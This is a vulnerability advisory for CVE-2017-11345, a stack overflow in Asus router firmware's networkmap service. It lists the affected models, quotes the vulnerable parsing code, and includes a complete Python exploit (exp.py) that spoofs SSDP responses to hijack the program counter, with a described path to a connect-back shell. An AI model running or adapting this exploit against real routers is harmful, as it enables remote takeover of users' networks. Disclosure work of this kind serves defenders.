forked from coincoin7/Wireless-Router-Vulnerability
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Asus_serviceTypeCopyOverflow.txt
193 lines (159 loc) · 7.85 KB
/
Asus_serviceTypeCopyOverflow.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
CVE-2017-11345
[Vulnerability]:
Stack buffer overflow in networkmap
------------------------------------------
[Exploitation]:
Can control the $pc.
Together with the above Global buffer overflow vulnerability,
can remote code execution and then get a connectback shell.
------------------------------------------
[Vendor of Product]:
Asus wireless router
------------------------------------------
[Affected Products and firmware version]:
Asuswrt-Merlin ,all the firmware and the latest firmware is 380.66_6
RT-AC5300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT_AC1900P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC68U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC68P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC88U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC66U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC66U_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC58U ,all the firmware,and the latest firmware is 3.0.0.4.380.7485
RT-AC56U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC55U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-AC52U ,all the firmware,and the latest firmware is 3.0.0.4.380.4180
RT-AC51U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N18U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-N66U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N56U ,all the firmware,and the latest firmware is 3.0.0.4.378.7177
RT-AC3200 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC3100 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT_AC1200GU ,all the firmware,and the latest firmware is 3.0.0.4.380.5577
RT_AC1200G ,all the firmware,and the latest firmware is 3.0.0.4.380.3167
RT-AC1200 ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
RT-AC53 ,all the firmware,and the latest firmware is 3.0.0.4.380.9883
RT-N12HP ,all the firmware,and the latest firmware is 3.0.0.4.380.2943
RT-N12HP_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.3479
RT-N12D1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N12+ ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT_N12+_PRO ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
RT-N16 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
------------------------------------------
[Attack Type]:
Remote
------------------------------------------
[Can Cause Denial of Service?]:
yes
------------------------------------------
[Reference]:
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/function.c#L903-L1032
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/ (chose the others can download the firmware sourcecode)
https://www.asus.com/Networking/Wireless-Routers-Products/
------------------------------------------
[Discoverer]:
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
------------------------------------------
[Affected components]:
Affected executable application: networkmap
Affected source code file: \release\src\router\networkmap\function.c
Affected function: store_description(char *msg)
------------------------------------------
[Vulnerability details]:
When the function process_device_repsonse of networkmap is parsing the SSDP answer
from a device and the SSDP answer has indicated the location like:
HTTP/1.1 200 OK
Location:HTTP://host:port/path
If the "HTTP://host:port/path" is valid, the networkmap will get the device descirption
xml by accessing "HTTP://host:port/path",and it will use the function store_description
to store the device descirption information to global sturct device_info.
In the switch case 6 which in the function store_description:
case 6: // tmp="urn:schemas-upnp-org:service:serviceType:v"
mxend = tmp;
i = 0; j = 0;
while(i != 4)
{
if(i == 3)
tmp[j++] = *mxend;
if(*mxend == ':')
i++;
mxend++;
}
tmp[j-1] = '\0';
strlcpy(description.service[s_num].name, tmp, sizeof(description.service[s_num].name));
NMP_DEBUG_F("service %d name = %s\n", s_num, tmp);
break;
if it couldn't found the fourth ':' in the stack, the stack buffer tmp will be overflow,
and this stack-based overflow can be used to gain control over networkmap’s control flow
by overwriting the saved $ra stored on the stack.
------------------------------------------
[Exploitation details]:
when answer the SSDP request, we can send the SSDP answer message like:
'HTTP/1.1 200 OK\r\nLocation:HTTP://192.168.2.31:1337/' + 'B'*231 + b'\x41\x41\x41:' + '\r\n\r\n'
And When the networkmap get the device descirption xml by accessing "HTTP://192.168.2.31:1337/",
we can respond a device descirption xml like:
<?xml><serviceType>AAAA<></root>
And then, after the code in case 6,the stack buffer tmp will be overflow,and the
data start from stack buffer tmp will become 'B'*231 + b'\x41\x41\x41',
and it lead to the $ra and $pc being set to 0x00414141.
Now we can control the $pc by overwriting the saved $ra stored on the stack.
For further exploitation,to get a ConnectBack shell,we can use the "Write data
at any address in heap" vulnerability which also in function store_description,
to write the ConnectBack shell shellcode on a fixed heap address,and then we
can use this Code Execution vulnerability to let $pc be set as the ConnectBack shell shellcode address.
------------------------------------------
[exp.py]:
# Tested product and firmware version:
# RT-N12HP_B1 (3.0.0.4.380.3479)
# coding=utf-8
ROUTER_IP = '192.168.2.1' #asus wireless router ip
IP = '192.168.2.31' #attacker ip
INTERACE = 'eth0' #attacker host network interface
import time
import socket
import sys
import os
import threading
import socketserver
sc = '<?xml>'
sc += '<serviceType>'
sc += b'AAAA' * 49
sc += 'AA<></root>'
def mac():
os.system('macchanger -A {}'.format(INTERACE))
os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {};'.format(INTERACE, INTERACE, IP, ROUTER_IP))
class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print('[-] got xml request')
self.request.recv(1024)
print("[-] sending xml")
self.request.send(sc)
class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
socketserver.TCPServer.allow_reuse_address = True
server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
t = threading.Thread(target=server.serve_forever)
t.start()
print("[-] Please opens a new terminal and use ping ROUTER_IP to Speed up SSDP network interaction")
addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('239.255.255.250', 1900))
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(addrinfo[4][0]) + socket.inet_aton('0.0.0.0'))
mac()
times = 0
state = 'Overflow'
while True:
data, sender = s.recvfrom(1500)
if sender[0] == ROUTER_IP and sender[1] == 1008:
print("[-] received SSDP M-SEARCH Package")
data = {}
data['Overflow'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode() + b':1337/' + 'B'*231 + b'\xe0\xbb\x41:' + '\r\n\r\n'
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.sendto(data[state], sender)
if state == 'Overflow':
print("[-] Send the GetXmlRequest to router")
time.sleep(20)
os._exit(0)